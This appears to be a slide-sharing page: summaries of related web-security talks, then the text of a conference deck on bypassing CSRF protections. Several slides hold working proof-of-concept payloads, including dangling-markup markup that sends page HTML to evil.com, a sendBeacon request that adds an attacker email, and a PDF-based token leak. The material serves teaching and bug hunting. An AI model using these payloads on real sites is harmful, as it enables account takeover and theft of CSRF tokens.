XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
A story of the passive aggressive sysadmin of AEMFrans Rosén
# By Frans Rosén
Adobe Experience Manager is an enterprise CMS with a troubled history. It was created with the angle of high customization factor, enabling consulting firms to deploy it all over the world for huge customers.
Then came security.
Frans will go through some terrible default configuration mistakes, Adobe’s love for bad Flash and how a sysadmin accidentialy exposed an international multi billion dollar company using only sad thoughts.
# About speaker
Frans Rosén is a tech entrepreneur, bug bounty hunter and a Security Advisor at Detectify, a security service for developers. He’s a frequent blogger at Detectify Labs and a top ranked participant of bug bounty programs, receiving some of the highest bounty payouts ever on HackerOne.
Frans was recently featured as #2 on Hackread’s list of 10 Famous Bug Bounty Hunters of All Time and the results of his security research has been covered in numerous international publications such as Observer, BBC, Ars Technica, Wired and Mashable.
This presentation illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks.
Presented @ BSides Manchester 2017 & SteelCon 2017
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
While input validation vulnerabilities such as XSS and SQL injection have been intensively studied, a new class of injection vulnerabilities called HTTP Parameter Pollution (HPP) has not received as much attention. HPP attacks consist of injecting encoded query string delimiters into other existing parameters. If a web application does not properly sanitize the user input, a malicious user can compromise the logic of the application to perform either client-side or server-side attacks. One consequence of HPP attacks is that the attacker can potentially override existing hard-coded HTTP parameters to modify the behavior of an application, bypass input validation checkpoints, and access and possibly exploit variables that may be out of direct reach.
In the talk we present the first automated system for the detection of HPP vulnerabilities in real web applications. Our approach consists of injecting fuzzed parameters into the web application and a set of tests and heuristics to determine if the pages that are generated contain HPP vulnerabilities. We used this system to conduct a large-scale experiment by testing more than 5,000 popular websites and discovering unknown HPP flaws in many important and well-known sites such as Microsoft, Google, VMWare, Facebook, Symantec, Paypal and others. These sites have been all informed and many of them have acknowledged or fixed the problems. We will explain in details how to efficiently detect HPP bugs and how to prevent this novel class of injection vulnerabilities in future web applications.
General Waf detection and bypassing techniques. Main focus to demonstrate that how to take right approach to analyse the behaviour of web application firewall and then create test cases to bypass the same.
This document discusses methods for bypassing file upload restrictions on websites, including modifying HTTP headers, embedding malicious code in image files, and using NULL bytes in filenames. It demonstrates how these techniques can allow uploading PHP shells or other code to gain remote command execution or full server control. The document recommends upload logs and secure coding as better security practices than trying to implement perfect input filtering, which is complicated and can still be bypassed.
This document discusses cross-site scripting (XSS) attacks and techniques for bypassing web application firewalls (WAFs) that aim to prevent XSS. It explains how XSS payloads can be embedded in XML, GIF images, and clipboard data to exploit browser parsing behaviors. The document also provides examples of encoding payloads in complex ways like JS-F**K to evade WAF signature rules.
This document discusses local file inclusion (LFI) vulnerabilities that can allow attackers to execute remote code. It explains how LFI works by dynamically including user-supplied files, and how attackers can use path traversal and null bytes to read arbitrary local files. It then describes how attackers can use LFI to execute reverse shells on the target server by including a PHP script that opens a remote connection. The document provides examples of vulnerable PHP functions and common files that can be read. It concludes by recommending input validation and whitelisting of allowed files to defend against LFI attacks.
This document discusses journeying from local file inclusion (LFI) vulnerabilities to remote code execution (RCE). It begins with an introduction and overview. It then covers LFI in detail, explaining how to find and exploit LFI vulnerabilities using directory traversal to read files. Next, it discusses remote file inclusion (RFI) and how it can lead to code execution. Prevention methods are outlined. Finally, it demonstrates exploiting LFI and RFI on a test server, verifying with phpinfo() and ping, before obtaining a reverse shell through a GET request. Common log locations are also listed.
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
The slides here are part of my presentation at the Confraria0day meeting in March 2017. It is an introduction to the various HTTP security headers with some insights about them. It covers HSTS, HPKP, X-Frame-Options, Content Security Policy, X-XSS-Protection, X-Content-Type-Options, Referrer-Policy and Set-Cookie options.
Directory traversal, also known as path traversal, allows attackers to access files and directories outside of the web server's designated root folder. This can lead to attacks like file inclusion, where malicious code is executed on the server, and source code disclosure, where sensitive application code is revealed. Local file inclusion allows attackers to include files from the local web server, while remote file inclusion includes files from external websites, potentially allowing remote code execution on the vulnerable server.
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
This document provides an introduction to short file names (SFN) in Windows and discusses issues related to inadvertently disclosing SFNs through IIS. It begins with an overview of how SFNs work and how they map to long file names. It then discusses the history of SFN disclosure through IIS and how it can be abused to reveal sensitive file names. The document provides examples of automatically and manually enumerating SFNs to discover long file names. It concludes with tips and tricks for SFN enumeration along with examples of using it to reveal parts of unknown file names.
This is a bug bounty hunter presentation given at Nullcon 2016 by Bugcrowd's Faraz Khan.
Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd
This document discusses server-side request forgery (SSRF) exploitation. It provides examples of how SSRF can be used to access internal networks and bypass authentication by forging requests from the vulnerable server. Specific cases described include exploiting OAuth token hijacking, memcached exploitation using protocol smuggling, and exploiting vulnerabilities in libraries like TCPDF, LWP, and Postgres that enable SSRF. The document encourages finding creative ways to leverage SSRF and related vulnerabilities like open redirects, XML external entities, and SQL injection to compromise hosts and internal services.
This document provides an overview of server-side request forgery (SSRF) vulnerabilities, including what SSRF is, its impact, common attacks, bypassing filters, and mitigations. SSRF allows an attacker to induce the application to make requests to internal or external servers from the server side, bypassing access controls. This can enable attacks on the server itself or other backend systems and escalate privileges. The document discusses techniques for exploiting trust relationships and bypassing blacklists/whitelists to perform SSRF attacks. It also covers blind SSRF and ways to detect them using out-of-band techniques. Mitigations include avoiding user input that can trigger server requests, sanitizing input, whitelist
The document discusses Server Side Request Forgery (SSRF), including what it is, different types (blind and basic), ways to exploit it like bypassing filters and chaining vulnerabilities, tools that can be used for detection, and two case studies of SSRF vulnerabilities found in the wild. The first case involves using an SSRF to retrieve internal data and then storing malicious HTML in a generated PDF. The second case was an unauthenticated blind SSRF in a Jira OAuth authorization controller that was exploited through a malicious Host header.
Cross-site scripting (XSS) is an injection attack where malicious scripts are injected into otherwise trusted sites. There are three main types of XSS attacks: reflected XSS occurs via URLs, stored XSS occurs when scripts are stored in a database and delivered to users, and DOM-based XSS modifies the DOM environment. XSS attacks can lead to issues like session hijacking, phishing, and port scanning. Developers can prevent XSS by validating and encoding untrusted data, and using HTTP-only and secure flags for cookies.
The document provides instructions on how to exploit XML external entity (XXE) vulnerabilities and become a more advanced "Jedi" level hacker. It begins with XML basics and progresses through external entity attacks, file reads, port scanning, denial of service attacks, and advanced techniques like out-of-band data exfiltration and pass-the-hash attacks. The document emphasizes moving beyond just direct output to more stealthy, no-output exploitation.
(2012) Le cyberespace, nouveau champ de bataillefelixaime
Présentation donnée en très petits comités en septembre 2012 sur tout ce qui est lié à la cyberdéfense. Je la dévoile que maintenant, désolé pour la qualité.
The document describes a Java class that implements a RESTful web service. It contains annotations that define the resource path, HTTP methods, request parameters, and response types. The class contains multiple methods that retrieve request parameters in different ways, such as from the URI query string, HTTP headers, request body, or the entity itself.
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
Mikhail Egorov and Sergey Soldatov presented their research on exploiting injections in Hibernate ORM. They demonstrated that while Hibernate Query Language (HQL) is more limited than SQL, it is possible to exploit HQL injections to conduct SQL injections on popular databases like MySQL, PostgreSQL, Oracle, and Microsoft SQL Server. They did this by leveraging features of Hibernate and the databases like how Hibernate handles string escaping and allows unicode characters in identifiers. Their talk provided examples of exploiting each database and a takeaway that Hibernate is not a web application firewall and HQL injections can be used to perform SQL injections.
This document provides an outline for a Capture the Flag (CTF) event with details on CTF concepts, server setup, and examples of challenges. Some key points:
- It introduces CTFs and the AIS3 final CTF event, which will use a jeopardy style format across categories like Misc, Binary, Pwn, Web, and Crypto.
- It provides instructions for setting up a CTF server on Linux with tricks like disabling stack protectors, allowing code execution in the stack, and disabling address space layout randomization (ASLR) to make challenges simpler.
- It outlines some simple initial challenges like a basic buffer overflow example in C, using cryptography, and two pwn
XSS (cross-site scripting) is a common web vulnerability that allows attackers to inject client-side scripts. The document discusses various types of XSS attacks and defenses against them. It covers:
1) Reflected/transient XSS occurs when untrusted data in URL parameters is immediately displayed without sanitization. Stored/persistent XSS occurs when untrusted data is stored and later displayed. DOM-based XSS manipulates the DOM.
2) Defenses include HTML/URL encoding untrusted data before displaying it, validating all inputs, and using context-specific encoding for HTML elements, attributes, JavaScript, and URLs.
3) The OWASP Java Encoder Project and Microsoft Anti
This document discusses browser security challenges posed by new technologies like HTML5, cross-document messaging, and browser plugins. It summarizes potential attacks like cross-site scripting through relaxed origin policies, browser SQL injection using HTML5 client storage, and using cross-document messaging to enable cross-site communication. The document advocates for the OWASP Intrinsic Group to work with browser vendors to address these issues.
I'm take picture from here and there by goggling not mentioning all source please let me know if anyone has any objection. This presentation was presented in “securITy” Information Security Conference at BASIS SoftExpo 2012
This talk is a generic but comprehensive overview of security mechanism, controls and potential attacks in modern browsers. The talk focuses also on new technologies, such as HTML5 and related APIs to highlight new attack scenario against browsers.
This is a multi-faceted workshop that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I'll demonstrate how traditional exploits are being used together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I'll then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMagno Logan
The document discusses various web application vulnerabilities from the OWASP Top 10 list, including cross-site scripting (XSS), SQL injection, remote file inclusion, insecure direct object references, and cross-site request forgery (CSRF). It provides examples of each vulnerability type and recommendations for prevention. It also introduces Mutillidae, a deliberately vulnerable web application that can be used to demonstrate these vulnerabilities in a controlled environment.
Cross-Site Request Forgery (CSRF in short) is a kind of a web application vulnerability which allows malicious website to send unauthorized requests to a vulnerable website using active session of its authorized users
In simple words, it’s when an “evil” website posts a new status in your twitter account on your visit while the login session is active on twitter.
For security reasons the same origin policy in browsers restricts access for browser-side programming languages such as Javascript to access a remote content.
As the browsers configurations may be modified, the best way to protect web application against CSRF is to secure web application itself.
This document provides an overview of a training session on secure JavaScript development. The training will cover topics like DOM-based XSS vulnerabilities, JSON security issues like parsing and hijacking, mitigating clickjacking, security aspects of HTML5 features like cross-origin requests and client-side storage, and things developers should avoid in JavaScript code. The trainer is an expert in security research and tools development with a focus on browser and JavaScript security.
OWASP Portland - OWASP Top 10 For JavaScript DevelopersLewis Ardern
With the release of the OWASP TOP 10 2017 we saw new issues rise as contenders of most common issues in the web landscape. Much of the OWASP documentation displays issues, and remediation advice/code relating to Java, C++, and C#; however not much relating to JavaScript. JavaScript has drastically changed over the last few years with the release of Angular, React, and Vue, alongside the popular use of NodeJS and its libraries/frameworks. This talk will introduce you to the OWASP Top 10 explaining JavaScript client and server-side vulnerabilities.
Best practices of web app security (samvel gevorgyan)ClubHack
This document discusses best practices for web application security in 2010. It covers common vulnerabilities like cross-site scripting, SQL injection, information leakage, and cross-site request forgery. For each vulnerability, it provides descriptions, examples, and solutions. The top solutions mentioned are OWASP HTML Purifier for cross-site scripting, GreenSQL open source database firewall for SQL injection, and OWASP CSRFGuard for cross-site request forgery. The document aims to help web developers protect their applications from various security risks.
The document summarizes various techniques for exploiting vulnerabilities in web applications, including exploiting logged out XSS vulnerabilities, CSRF protected XSS, XSS via HTTP headers, file upload issues, and encoding tricks for SQL injection. It discusses using techniques like browser password managers, session fixation, persistent data stores, and Flash to circumvent protections.
This document provides an overview of unusual web application security bugs and exploitation techniques discussed by Alex Kuznetsov, including exploiting logged out XSS vulnerabilities, CSRF protected XSS, XSS via HTTP headers, file upload issues, PHP oddities, SQL injection encoding attacks, and more obscure bugs involving cookies, timing attacks, and cookie policies. The talk outlines new and creative ways to bypass input validation and achieve remote code execution or sensitive data disclosure on vulnerable sites.
In this talk we will demonstrate and unveil the latest developments on browser specific weaknesses including creative new mechanisms to compromise confidentiality, successfully perform login and history detection, serve mixed content, deliver malicious ghost binaries without a C&C server, exploit cache / timing side channels to extract secrets from third-party domains and leverage new HTML5 features to carry out more stealthy attacks. This is a fast-paced practical presentation with live demos that will challenge your knowledge of the Same Origin Policy and push the limits of what is possible with today’s web clients.
Topics will include: Current XSS filter bypass for IE & Chrome. Same Origin Policy timing attacks on Chrome. Data URI malware with spoofed URLs and ‘download’ attribute. HTML5 drag & drop exploitation. History stealing attacks. Clipboard stealing attacks. Cross-domain hijacking attacks with flash content sniffing, Blob URLs and SVGs. Spoofing URL address bars on modern browsers. Advanced browser encoding quirks and exploitation techniques.
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Divyanshu
Browser exploitation| Reporting vulnerability in top browsers and finding CVE.
Session in Null Bangalore Meet 23 November 2019 Null/OWASP/G4H combined meetup
Thanks to respective researchers for their work.
The document summarizes various web application vulnerabilities from 2010, including client-side attacks like cross-site scripting (XSS) and cross-site request forgery (CSRF), and server-side attacks like SQL injection, XML injection, and remote code execution via stored procedures. It provides examples of exploiting these vulnerabilities on modern web applications and defenses against these attacks.
XSS (cross-site scripting) is a client-side vulnerability that allows injection of malicious JavaScript which can then be run on a victim's browser. The document discusses different types of XSS (non-persistent, persistent, DOM-based), examples of how to perform basic and advanced XSS attacks, ways XSS has been used on major websites, and how attackers can exploit XSS vulnerabilities for activities like session hijacking, cookie stealing, clickjacking, and more.
Similar to Neat tricks to bypass CSRF-protection (20)
A Hacker's perspective on AEM applications securityMikhail Egorov
Mikhail Egorov gave a presentation on security vulnerabilities in Adobe Experience Manager (AEM) applications. He discussed three vulnerabilities - CVE-2019-8086, CVE-2019-8087, and CVE-2019-8088 - which involved XML external entity injection, JavaScript code injection, and ways to exploit them. He explained the technical details of each vulnerability and provided examples of payloads and steps required for exploitation. Egorov concluded by recommending keeping AEM updated, blocking anonymous write access to certain paths, and removing demo content to help prevent security issues.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
This document discusses vulnerabilities in WebSocket APIs. It begins with an introduction to the speaker and overview of WebSocket protocols. It then covers specific vulnerabilities like cross-site WebSocket hijacking, authentication issues, and request smuggling through WebSocket connections. The document demonstrates these vulnerabilities through challenges on public sites. It concludes with ideas for further research on WebSocket security.
New methods for exploiting ORM injections in Java applicationsMikhail Egorov
This document summarizes new methods for exploiting ORM injections in Java applications. It begins with introductions to ORM, JPA, and common ORM libraries. It then outlines several exploitation techniques, including using special functions in EclipseLink and TopLink to call database functions, abusing string handling and quote processing in OpenJPA, and leveraging features in Hibernate and specific databases like string escaping, quoted strings, magic functions, and Unicode delimiters. Code examples and demonstrations are provided for most of the techniques.
introduction of Ansys software and basic and advance knowledge of modelling s...sachin chaurasia
Ansys Mechanical enables you to solve complex structural engineering problems and make better, faster design decisions. With the finite element analysis (FEA) solvers available in the suite, you can customize and automate solutions for your structural mechanics problems and parameterize them to analyze multiple design scenarios. Ansys Mechanical is a dynamic tool that has a complete range of analysis tools.
Efficient hot work permit software for safe, streamlined work permit management and compliance. Enhance safety today. Contact us on +353 214536034.
https://sheqnetwork.com/work-permit/
Responsibilities of Fleet Managers and How TrackoBit Can Assist.pdfTrackobit
What do fleet managers do? What are their duties, responsibilities, and challenges? And what makes a fleet manager effective and successful? This blog answers all these questions.
A Comparative Analysis of Functional and Non-Functional Testing.pdfkalichargn70th171
A robust software testing strategy encompassing functional and non-functional testing is fundamental for development teams. These twin pillars are essential for ensuring the success of your applications. But why are they so critical?
Functional testing rigorously examines the application's processes against predefined requirements, ensuring they align seamlessly. Conversely, non-functional testing evaluates performance and reliability under load, enhancing the end-user experience.
An MVP (Minimum Viable Product) mobile application is a streamlined version of a mobile app that includes only the core features necessary to address the primary needs of its users. The purpose of an MVP is to validate the app concept with minimal resources, gather user feedback, and identify any areas for improvement before investing in a full-scale development. This approach allows businesses to quickly launch their app, test its market viability, and make data-driven decisions for future enhancements, ensuring a higher likelihood of success and user satisfaction.
A captivating AI chatbot PowerPoint presentation is made with a striking backdrop in order to attract a wider audience. Select this template featuring several AI chatbot visuals to boost audience engagement and spontaneity. With the aid of this multi-colored template, you may make a compelling presentation and get extra bonuses. To easily elucidate your ideas, choose a typeface with vibrant colors. You can include your data regarding utilizing the chatbot methodology to the remaining half of the template.
Discover the Power of ONEMONITAR: The Ultimate Mobile Spy App for Android Dev...onemonitarsoftware
Unlock the full potential of mobile monitoring with ONEMONITAR. Our advanced and discreet app offers a comprehensive suite of features, including hidden call recording, real-time GPS tracking, message monitoring, and much more.
Perfect for parents, employers, and anyone needing a reliable solution, ONEMONITAR ensures you stay informed and in control. Explore the key features of ONEMONITAR and see why it’s the trusted choice for Android device monitoring.
Share this infographic to spread the word about the ultimate mobile spy app!
Ansys Mechanical enables you to solve complex structural engineering problems and make better, faster design decisions. With the finite element analysis (FEA) solvers available in the suite, you can customize and automate solutions for your structural mechanics problems and parameterize them to analyze multiple design scenarios. Ansys Mechanical is a dynamic tool that has a complete range of analysis tools.
4. A lot of WebApps still use cookies for session management
CSRF-protection bypasses
SameSite cookies feature not widely implemented
Supported only by Chrome and Opera browsers
Changes are required on the server-side
Why CSRF-attacks works in 2017?
5. Will be excluded from OWASP Top 10 Project 2017
P2 (High) category in Bugcrowd VRT* (App-Wide CSRF)
CSRF in 2017
* https://bugcrowd.com/vulnerability-rating-taxonomy
6. CSRF token
Double submit cookie
Content-Type based protection
Referer-based protection
Password confirmation (websudo)
SameSite Cookies (Chrome, Opera)
Popular CSRF-protections
8. CSRF Tokens
Double Submit
Cookie
CT-based Referer-based SameSite Cookies
XSS All All All All All
Dangling markup All - - - All*
Subdomain issues All All All - All*
Cookie Injection - All - - All*
Change CT - - All - All*
Non-simple CT - - All with Flash plugin,
IE11/FF ESR with Pdf
plugin
- All*
Bad Pdf IE11/FF ESR with
Pdf plugin
- IE11/FF ESR with Pdf
plugin
- All*
Spoof Referer - - - IE11/FF ESR with Pdf
plugin, Edge
All*
CSRF bypasses – still work for me
All – works for all browsers
All* – All browsers except browsers that support SameSite Cookies (Chrome & Opera)
9. XSS in WebApp allows to bypass the majority of CSRF-
protections
Just deal with it!!!
Bypass with XSS (1/8)
10. WebApp has HTML injection but not XSS (CSP, …)
The attacker can leak CSRF-token
Bypass with Dangling markup (2/8)
<img src='https://evil.com/log_csrf?html=
<form action='http://evil.com/log_csrf'><textarea>
11. Suppose subdomain foo.example.com is vulnerable to
XSS or subdomain takeover or cookie injection
The attacker can bypass
CSRF-token protection
Double-submit cookie protection
Content-Type based protection
Bypass with subdomain (3/8)
12. WebApp uses CORS for interaction with subdomains
The attacker can read CSRF-token
Bypass with subdomain (3/8)
Access-Control-Allow-Origin: https://foo.example.com
Access-Control-Allow-Credentials: true
13. There is an XSS on foo.example.com
Main domain contains crossdomain.xml
The attacker can upload JS files to foo.example.com
Bypass with subdomain (3/8)
<cross-domain-policy>
<allow-access-from domain="*.example.com" />
</cross-domain-policy>
14. The attacker can utilize Service Worker for foo.example.com to
read CSRF-token through Flash
Amazon CSRF - https://ahussam.me/Amazon-leaking-csrf-token-using-service-worker/
Bypass with subdomain (3/8)
var url = "https://attacker.com/bad.swf";
onfetch = (e) => {
e.respondWith(fetch(url);
}
15. The attacker can inject cookies for parent subdomain and
desired path
Browser will choose cookie that has specific path (injected
one)
He can bypass double submit cookie CSRF-protection
Bypass with subdomain (3/8)
16. PDF plugin from Adobe support FormCalc scripting
Adobe PDF plugin currently works in IE11 and Firefox ESR
get() and post() methods of FormCalc allow to
ex-filtrate CSRF-token
Kudos to @insertScript
Bypass with bad PDF (4/8)
17. Suppose the attacker can upload PDF file to example.com
and share it
Uploaded file is accessible through API from example.com
Tip: The attacker tries to upload PDF file as file of another
format (image file)
PDF plugin doesn’t care about Content-Type or Content-
Disposition headers … it just works …
Bypass with bad PDF (4/8)
19. Bypass with bad PDF (4/8)
<h1>Nothing to see here!</h1>
<embed src="https://example.com/shard/x1/sh/leak.pdf" width="0" height="0"
type='application/pdf'>
https://attacker.com/csrf-pdf.html
20. The attacker can bypass double submit cookie protection
through cookies injection
Variants of cookies injection
CRLF-injection
Browser bugs (like CVE-2016-9078 in Firefox)
Etc.
Bypass with Cookies injection (5/8)
21. Developers seriously assume that non-standard data format
in the body (i.e. binary) stops CSRF
Sometimes backend doesn’t validate Content-Type header
Bypass by changing CT (6/8)
22. Bypass with PDF plugin (6/8)
POST /user/add/note HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com
Cookie: JSESSIONID=728FAA7F23EE00B0EDD56D1E220C011E.jvmroute8081;
Connection: close
Content-Type: application/x-thrift
Content-Length: 43
�addNote � � r �
23. Bypass with PDF plugin (6/8)
<script>
var request = new XMLHttpRequest();
request.open('POST', 'https://example.com/add/note', true);
request.withCredentials = true;
request.setRequestHeader("Content-type", "text/plain");
var data = ['0x80','0x01','0x00','0x01','0x00','0x00','0x00','0x07','0x67','0x65','0x74','0x55',
'0x73','0x65','0x72','0x00','0x00','0x00', '0x00','0x0b','0x00','0x01','0x00','0x00','0x00','0x00','0x00'];
var bin = new Uint8Array(data.length);
for (var i = 0; i < data.length; i++) {
bin[i] = parseInt(data[i], 16);
}
request.send(bin);
</script>
https://attacker.com/csrf-thrift.html
24. Via HTML forms or XHR api the attacker can send only
“simple” content types
text/plain
application/x-www-form-urlencoded
multipart/form-data
Bypass with arbitrary CT (7/8)
25. How to send arbitrary Content-Type header?
Bugs in browsers (famous navigator.sendBeacon in Chrome)
Flash plugin + 307 redirect
PDF plugin + 307 redirect
Some backend frameworks support URL-parameters to redefine
Content-Type http://cxf.apache.org/docs/jax-rs.html#JAX-RS-Debugging
Bypass with arbitrary CT (7/8)
26. Bug in Chrome
https://bugs.chromium.org/p/chromium/issues/detail?id=490015
Publicly known for 2 years (2015-2017) - WTF!!!
navigator.sendBeacon() call allowed to send POST request
with arbitrary content type
Bypass with arbitrary CT (7/8)
27. Bypass with arbitrary CT (7/8)
<script>
function jsonreq() {
var data = '{"action":"add-user-email","Email":"attacker@evil.com"}';
var blob = new Blob([data], {type : 'application/json;charset=utf-8'});
navigator.sendBeacon('https://example.com/home/rpc', blob );
}
jsonreq();
</script>
https://attacker.com/csrf-sendbeacon.html
28. Bypass with arbitrary CT (7/8)
How it works - http://research.rootme.in/forging-content-type-header-with-flash/
29. Bypass with Referer spoof (8/8)
Bug in MS Edge kudos to @magicmac2000
https://www.brokenbrowser.com/referer-spoofing-patch-bypass/
It still works, but for GET requests only
Maybe your backend doesn’t distinguish GET and POST
requests?
31. Bypass with Referer spoof (8/8)
PDF plugin will send HTTP header
Some backends (e.g. Jboss / WildFly) treat space as colon
(end of the header name)
Referer http://example.com
Name :Value
Referer http://example.com
Name :Value
32. Tips for bughunters
There are a lot of APIs that have CSRF-protection based on
content type
Check subdomains for vulnerabilities (XSS, subdomain
takeover, cookie injection)
Trick with PDF uploading works well
Convert url-encoded body with CSRF-token to JSON format
without CSRF-token
34. EasyCSRF for Burp
EasyCSRF works for Burp Suite Free Edition, 223 SLOC in Jython
Download from https://github.com/0ang3el/EasyCSRF
Works as Proxy Listener (IProxyListener)
Modifies requests on the fly (removes CSRF parameters/headers,
changes method, etc.)
Highlights modified requests in Proxy History
You can visually judge in browser which modified requests are
failed/succeeded (error messages, no modification occurred, etc.)